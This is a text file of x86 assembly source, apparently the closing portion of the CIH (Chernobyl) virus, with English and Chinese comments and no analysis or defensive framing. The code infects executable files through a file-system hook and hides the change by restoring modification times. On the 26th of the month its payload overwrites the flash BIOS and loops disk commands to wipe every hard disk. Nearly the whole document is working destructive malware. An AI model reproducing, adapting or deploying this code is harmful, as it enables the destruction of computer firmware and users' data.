cih 源码.txt

第一个可写主班的网络传染的有大破坏的病毒的猿码

jmp WriteVirusCodeToFile 

; *************************** 
; * Not Set Infected Mark * 
; *************************** 

NotSetInfectedMark: 
add esp, 3ch 

jmp CloseFile 

; *************************** 
; * Set Virus Code * 
; * Section Table End Mark * 
; *************************** 

SetVirusCodeSectionTableEndMark: 

; Adjust Size of Virus Section Code to Correct Value 
add [eax], ebp 
add [esp+08h], ebp 

; Set End Mark 
xor ebx, ebx 
mov [eax-04h], ebx 

; *************************** 
; * When VirusGame Calls * 
; * VxDCall, VMM Modifies * 
; * the 'int 20h' and the * 
; * 'Service Identifier' * 
; * to 'Call [XXXXXXXX]'. * 
; *************************** 
; * Before Writing My Virus * 
; * to File, I Must Restore * 
; * them First. ^__^ * 
; *************************** 

lea eax, (LastVxDCallAddress-2-@9)[esi] 

mov cl, VxDCallTableSize 

LoopOfRestoreVxDCallID: 
mov word ptr [eax], 20cdh 

mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] 
mov [eax+2], edx 

movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] 

sub eax, edx 

loop LoopOfRestoreVxDCallID 

; *************************** 
; * Let's Write * 
; * Virus Code to the File * 
; *************************** 

WriteVirusCodeToFile: 
mov eax, dr1 
mov ebx, [eax+10h] 
mov edi, [eax] 

LoopOfWriteVirusCodeToFile: 

pop ecx 
jecxz SetFileModificationMark 

mov esi, ecx 
mov eax, 0d601h 
pop edx 
pop ecx 

call edi ; VXDCall IFSMgr_Ring0_FileIO 
jmp LoopOfWriteVirusCodeToFile 

; *************************** 
; * Let's Set CF = 1 ==> * 
; * Need to Restore File * 
; * Modification Time * 
; *************************** 

SetFileModificationMark: 
pop ebx 
pop eax 

stc ; Enable CF(Carry Flag) 
; ************************************* 
; * Close File * 
; ************************************* 

CloseFile: 
xor eax, eax 
mov ah, 0d7h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Need to Restore File Modification * 
; * Time !? * 
; ************************************* 

popf 
pop esi 
jnc IsKillComputer 

; ************************************* 
; * Restore File Modification Time * 
; ************************************* 

mov ebx, edi 

mov ax, 4303h 
mov ecx, (FileModificationTime-@7)[esi] 
mov edi, (FileModificationTime+2-@7)[esi] 
call ebx ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Disable OnBusy * 
; ************************************* 

DisableOnBusy: 
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus 

; ************************************* 
; * Call Previous FileSystemApiHook * 
; ************************************* 

prevhook: 
popad ; 

mov eax, dr0 
jmp [eax] 

; ************************************* 
; * Call the Function that the IFS * 
; * Manager Would Normally Call to * 
; * Implement this Particular I/O * 
; * Request. * 
; ************************************* 

pIFSFunc: 
mov ebx, esp 
push dword ptr [ebx+20h+04h+14h] ; Push pioreq 
call [ebx+20h+04h] ; Call pIFSFunc 
pop ecx ; 

mov [ebx+1ch], eax ; Modify EAX Value in Stack 

; *************************** 
; * After Calling pIFSFunc, * 
; * Get Some Data from the * 
; * Returned pioreq. * 
; *************************** 

cmp dword ptr [ebx+20h+04h+04h], 00000024h 
jne QuitMyVirusFileSystemHook 

; ***************** 
; * Get the File * 
; * Modification * 
; * Date and Time * 
; * in DOS Format.* 
; ***************** 

mov eax, [ecx+28h] 
mov (FileModificationTime-@6)[esi], eax 

; *************************** 
; * Quit My Virus' * 
; * IFSMgr_FileSystemHook * 
; *************************** 

QuitMyVirusFileSystemHook: 

popad ;恢复所有寄存器 

ret ;从病毒设置的文件钩子程序中退出 

; ************************************* 
; * Kill Computer !? ... *^_^* * ;KillComputer模块!!十分危险,; ************************************* 

IsKillComputer: 
; Get Now Day from BIOS CMOS 
mov al, 07h 
out 70h, al 
in al, 71h 

xor al, 26h ; ??/26/???? 

IF DEBUG 
jmp DisableOnBusy 
ELSE 
jnz DisableOnBusy 
ENDIF ;如果是每月的26号就KillComputer(太危险了).*^_^*. 

; ************************************** 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; * Kill Kill Kill Kill Kill Kill Kill * 
; ************************************** 

; *************************** 
; * Kill BIOS EEPROM * 
; *************************** 

mov bp, 0cf8h 
lea esi, IOForEEPROM-@7[esi] 

; *********************** 
; * Show BIOS Page in * 
; * 000E0000 - 000EFFFF * 
; * ( 64 KB ) * 
; *********************** 

mov edi, 8000384ch 
mov dx, 0cfeh 
cli 
call esi 

; *********************** 
; * Show BIOS Page in * 
; * 000F0000 - 000FFFFF * 
; * ( 64 KB ) * 
; *********************** 

mov di, 0058h 
dec edx ; and a0fh 
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h 
call esi 

; *********************** 
; * Show the BIOS Extra * 
; * ROM Data in Memory * 
; * 000E0000 - 000E01FF * 
; * ( 512 Bytes ) * 
; * , and the Section * 
; * of Extra BIOS can * 
; * be Writted... * 
; *********************** 

lea ebx, EnableEEPROMToWrite-@10[esi] 

mov eax, 0e5555h 
mov ecx, 0e2aaah 
call ebx 
mov byte ptr [eax], 60h 

push ecx 
loop $ 

; *********************** 
; * Kill the BIOS Extra * 
; * ROM Data in Memory * 
; * 000E0000 - 000E007F * 
; * ( 80h Bytes ) * 
; *********************** 

xor ah, ah 
mov [eax], al 

xchg ecx, eax 
loop $ 

; *********************** 
; * Show and Enable the * 
; * BIOS Main ROM Data * 
; * 000E0000 - 000FFFFF * 
; * ( 128 KB ) * 
; * can be Writted... * 
; *********************** 

mov eax, 0f5555h 
pop ecx 
mov ch, 0aah 
call ebx 
mov byte ptr [eax], 20h 

loop $ 

; *********************** 
; * Kill the BIOS Main * 
; * ROM Data in Memory * 
; * 000FE000 - 000FE07F * 
; * ( 80h Bytes ) * 
; *********************** 

mov ah, 0e0h 
mov [eax], al 

; *********************** 
; * Hide BIOS Page in * 
; * 000F0000 - 000FFFFF * 
; * ( 64 KB ) * 
; *********************** 
; or al 0h 
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch 
call esi 

; *************************** 
; * Kill All HardDisk * 
; *************************************************** 
; * IOR Structure of IOS_SendCommand Needs * 
; *************************************************** 
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * 
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * 
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * 
; *************************************************** 

KillHardDisk: 
xor ebx, ebx 
mov bh, FirstKillHardDiskNumber 
push ebx 
sub esp, 2ch 
push 0c0001000h 
mov bh, 08h 
push ebx 
push ecx 
push ecx 
push ecx 
push 40000501h 
inc ecx 
push ecx 
push ecx 

mov esi, esp 
sub esp, 0ach 

LoopOfKillHardDisk: 
int 20h 
dd 00100004h ; VXDCall IOS_SendCommand 

cmp word ptr [esi+06h], 0017h 
je KillNextDataSection 

ChangeNextHardDisk: 
inc byte ptr [esi+4dh] 

jmp LoopOfKillHardDisk 

KillNextDataSection: 
add dword ptr [esi+10h], ebx 
mov byte ptr [esi+4dh], FirstKillHardDiskNumber 

jmp LoopOfKillHardDisk 

; *************************** 
; * Enable EEPROM to Write * 
; *************************** 

EnableEEPROMToWrite: 
mov [eax], cl 
mov [ecx], al 
mov byte ptr [eax], 80h 
mov [eax], cl 
mov [ecx], al 

ret 

; *************************** 
; * IO for EEPROM * 
; *************************** 

IOForEEPROM: 
@10 = IOForEEPROM 

xchg eax, edi 
xchg edx, ebp 
out dx, eax 

xchg eax, edi 
xchg edx, ebp 
in al, dx 

BooleanCalculateCode = $ 
or al, 44h 

xchg eax, edi 
xchg edx, ebp 
out dx, eax 

xchg eax, edi 
xchg edx, ebp 
out dx, al 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

LastVxDCallAddress = IFSMgr_Ring0_FileIO 
VxDCallAddressTable db 00h 
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate 
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook 
db IFSMgr_Ring0_FileIO-UniToBCSPath 

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的调用号 
VxDCallTableSize = ($-VxDCallIDTable)/04h 

; ********************************************************* 
; * Virus Version Copyright * 
; ********************************************************* 

VirusVersionCopyright db 'CIH v' 
db MajorVirusVersion+'0' 
db '.' 
db MinorVirusVersion+'0' ; 
db ' TATUNG' ;作者名字 

; ********************************************************* 
; * Virus Size * 
; ********************************************************* 

VirusSize = $ 
; + SizeOfVirusCodeSectionTableEndMark(04h) 
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) 
; + SizeOfTheFirstVirusCodeSectionTable(04h) 

; ********************************************************* 
; * Dynamic Data * 
; ********************************************************* 

VirusGameDataStartAddress = VirusSize 
@6 = VirusGameDataStartAddress 
OnBusy db 0 ;忙标志 
FileModificationTime dd ? 

FileNameBuffer db FileNameBufferSize dup(?) 
@7 = FileNameBuffer 

DataBuffer = $ 
@8 = DataBuffer 
NumberOfSections dw ? 
TimeDateStamp dd ? 
SymbolsPointer dd ? ; 
NumberOfSymbols dd ? 
SizeOfOptionalHeader dw ? 
_Characteristics dw ? 
Magic dw ? 
LinkerVersion dw ? 
SizeOfCode dd ? 
SizeOfInitializedData dd ? 
SizeOfUninitializedData dd ? 
AddressOfEntryPoint dd ? 
BaseOfCode dd ? 
BaseOfData dd ? 
ImageBase dd ? 
@9 = $ 
SectionAlignment dd ? 
FileAlignment dd ? 
OperatingSystemVersion dd ? 
ImageVersion dd ? 
SubsystemVersion dd ? 
Reserved dd ? 
SizeOfImage dd ? 
SizeOfHeaders dd ? 
SizeOfImageHeaderToRead = $-NumberOfSections ; 
; 
NewAddressOfEntryPoint = DataBuffer ; DWORD ; 
SizeOfImageHeaderToWrite = 04h ; 

StartOfSectionTable = @9 
SectionName = StartOfSectionTable ; QWORD 
VirtualSize = StartOfSectionTable+08h ; DWORD 
VirtualAddress = StartOfSectionTable+0ch ; DWORD 
SizeOfRawData = StartOfSectionTable+10h ; DWORD 
PointerToRawData = StartOfSectionTable+14h ; DWORD 
PointerToRelocations = StartOfSectionTable+18h ; DWORD 
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD 
NumberOfRelocations = StartOfSectionTable+20h ; WORD 
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD 
Characteristics = StartOfSectionTable+24h ; DWORD 
SizeOfScetionTable = Characteristics+04h-SectionName ; 

; ********************************************************* 
; * Virus Total Need Memory * 
; ********************************************************* 

VirusNeedBaseMemory = $ 

VirusNeedBaseMemory = $ 

VirusTotalNeedMemory = @9 
; + NumberOfSections(??)*SizeOfScetionTable(28h) 
; + SizeOfVirusCodeSectionTableEndMark(04h) 
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) 
; + SizeOfTheFirstVirusCodeSectionTable(04h) 

; ********************************************************* 
; ********************************************************* 

VirusGame ENDS 

END FileHeader